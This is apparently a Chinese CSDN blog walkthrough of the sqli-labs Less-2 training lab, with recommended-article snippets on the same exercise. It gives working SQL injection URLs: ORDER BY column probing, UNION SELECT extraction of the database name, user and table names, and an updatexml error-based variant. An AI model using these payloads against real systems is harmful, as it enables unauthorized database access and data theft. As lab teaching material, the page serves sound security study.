GET-Error based-intiger based (基于错误的GET整型注入) Less-2

最新推荐文章于 2023-05-28 15:49:22 发布
最新推荐文章于 2023-05-28 15:49:22 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: sqli-labs 文章标签: SQL注入 sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/water0diamond/article/details/88424583
版权
本文主要介绍SQL注入实战中的LESS-2关卡,通过错误信息确定数字型ID注入,利用ORDER BY和UNION SELECT进行字段探测,逐步揭示数据库名、用户、表名以及列名,并最终获取特定表中的数据。
摘要由CSDN通过智能技术生成

进入第二关,有了less-1的基础后,我们直接开始提交参数。判断是否有注入点。  

测一下id可以观察到报错信息可以看出来是数字型id,且没有任何包裹

使用order by  http://localhost/sqli/Less-2/?id=1 order by 1%23 数字变化后可以试出字段

联合查询字段  http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 用报错方式来显示可以看出

可以看到有返回值出现 查询数据库名和用户 http://localhost/sqli/Less-2/?id=-1 union select 1,database(),user()%23

最低0.47元/天 解锁文章
water-diamond
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GET-ERROR based-Single quotes – String (GET型基于错误的单引号字符型注入) Less-1
water0diamond的博客
03-12 926
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类型是否为字符串,用单引号测试,出现‘’’说明id为字符串类型 那么下面我们试着添加...
sqli-labs】 less2 GET - Error based - Intiger based (基于错误的GET整型注入)
ajxi63204的博客
01-18 265
与less1相同,直接走流程 提交参数,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 http://localhost/sqli/Less-2/?id=-1 uni...
sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
luosaierdadi的博客
07-06 197
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉,其它保持不变就行了。
SQL注入攻击】GET-Error based - Intiger based (基于错误的GET整型注入)
sm1918451478的博客
10-21 927
SQL注入攻击】Error based - Intiger based (基于错误的GET整型注入)
sql-labs SQL注入平台——第二关Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
Onlyone_1314的博客
05-28 1631
只返回了2、3说明,后端从数据库中执行SQL语句select 1,2,3;只在前端显示了第2、3个字段,所以我们能看到的就只有第2、3个字段,就要把注入点放在第2、3个位置上。查询id为0的用户肯定是没有返回结果的,这样返回的就只有union联合查询的第二个查询 select 1,2,3;得到security数据库中的表emails,referers,uagents,users。返回结果错误:没有第4列数据,说明只存在三列数据。查询,返回结果按照前4列数据排序。(3)查询当前数据库的名称。
get-pip.py
08-30
$ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py # 下载安装脚本 $ sudo python get-pip.py # 运行安装脚本
pip安装脚本 get-pip.py
10-26
pip安装脚本 get-pip.py
get-pip程序.py
08-23
get-pip
node-Get-StartApps:NodeJS的Powershell Get-StartApps命令的基于无依赖的承诺的包装器
04-07
Powershell Get-StartApps命令的基于无依赖的承诺的包装器。 安装和使用示例 npm install get-startapps 查找所有Xbox应用: const ps = require ( 'get-startapps' ) ; ps ( "Xbox" ) . then ( ( result ) => { ...
get-pip.zip
04-28
get-pip.py脚本,便于下载使用,用于linux安装pip使用,下载容易失败,特上传一份,有需要的小伙伴直接获取即可,解压密码pipget
Sqli-labs Less-2 GET - Error based - Intiger based
04-14 156
这个题目,打开网页显示输入一个整数id作为参数,输入id=1打开页面查看,显示出了一个名字和密码,在1后面加单引号测试一下看会不会出错。 可以看到报了一个语法错误。接下来再尝试在后面跟 and 1=1#和and 1=2# 测试一下。 /sql/Less-2/?id=1 and 1=1# 结果如下图,与id=1结果没有不同,下面尝试 and 1=2; /sql/Less-2/?id=1 and 1=2# 当注入 and 1=2;时 返回结果与上面不同,可以确定这是一个注入点。
sqli-labs练习(二)----------GET-Error based-ingiter based
wkend的博客
04-15 356
这一节是数字型注入sql查询语句源码$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 可以看到,$id并没有用单引号括起来,在sql语句中,对于数字型是数据可以不加单引号,不用考虑单引号的闭合以及注释问题。 输入1,查看结果 输入1',查看结果 由此可以判定,这是属于数字型sql注入。 所以,这里和上一节的区别就是不加单引...
sqli-lbs-2 GET - Error based - Intiger based (基于错误的GET整型注入)
qq_45756971的博客
10-18 197
知识点:1,判断是数字型还是字符型,单引号还是双引号 2,union select联合查询注入 3,payload原理与防御措施 这道题与上道题的主要区别就是这个是整型,即这个题的id参数没有引号,只是数字,这意味着在你绕过的时候可以不需要对后面的引号过滤(如果没有其他干扰的话) 大概步骤:1.输入?id=2-1页面信息发生变化,说明此处是数值型注入 2.order by 3 页面显示正常,order by 4页面显示不正常,所以该表有3列数据 3.接着可以使用联合查询进行注入,详细过程参考第一关 接下来
Less2-GET-基于错误-数字型
qq_41883052的博客
05-15 194
1、寻找注入点 初始: 页面无id参数 添加?id=1页面返回正常信息 添加单引号测试,页面报错,可能存在注入漏洞 分析报错: 'LIMIT 0,1 处有错误 此时可能为 select * from table where id = 1' LIMIT 0,1 而'是我们添加 真正的原语句可能为 select * from table where id = 1 LIMIT 0,1 可控参数没有被引号包围,属于数字型 去掉我们测试的引号,直接用 and 1=1 判断恒真的情况 发现页面正常显示信息
sql注入less2
Mdcq123的博客
10-15 247
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
sqli-lab笔记--less02 (Error Based- intiger)基于错误整型注入
TYW168168的博客
11-01 188
第一节 已经详细介绍了,注入的过程。接下来可是第二节 本节和第一节几乎一样,只是$id没有使用单引号括起来,因为sql语句中针对数字型的数据可以加单引号。这里,不添加单引号,注入更加简单了,不用闭合单引号了。 第一节:针对变量id使用单引号闭合,如图: 第二节:变量没有使用单引号,更简单。具体如下: 获取数据库名称: 获取数据表: 获取字段: 获取具体值:...
sqli-labs】 less25a GET- Blind based -All you OR&AND belong to us -Intiger based(GET型基于盲注的去除了or和and的...
ajxi63204的博客
01-27 124
因为过滤是针对输入的字符串进行的过滤,所以如果过滤了or and的话,提交id=1和id=and1结果应该相同 http://localhost/sqli-labs-master/Less-25a/?id=and1 采用双写试一下,页面就不正常了 http://localhost/sqli-labs-master/Less-25a/?id=aandnd1 ...
sqli-labs】 less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)...
ajxi63204的博客
01-31 160
http://192.168.136.128/sqli-labs-master/Less-46/?sort=1 sort=4时出现报错 说明参数是添加在order by 之后 错误信息没有屏蔽,直接使用UpdateXml函数报错 http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and Upda...
sql注入-Less-2-4
dahege666的博客
04-03 341
Less-2 添加一个id,响应正常 将'(单引号)添加到数字中 我们得到了一个 Mysql 返回的错误,提示我们语法错误。 现在执行的查询语句如下: Select * from TABLE where id = 1’ ; 所以这里的单引号破坏了查询,导致抛出错误。因此我们得出的结果是,查询代码使用了整数。 Select * from TABLE where id = (so...
python get-pip.py SyntaxError: invalid syntax
最新发布
06-05
当你尝试运行这个文件时遇到 `SyntaxError: invalid syntax` 的错误,通常意味着Python解释器无法解析脚本中的某些语法,可能是由于以下几个原因: 1. 文件内容中可能含有不符合Python语法规则的字符或表达式。 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值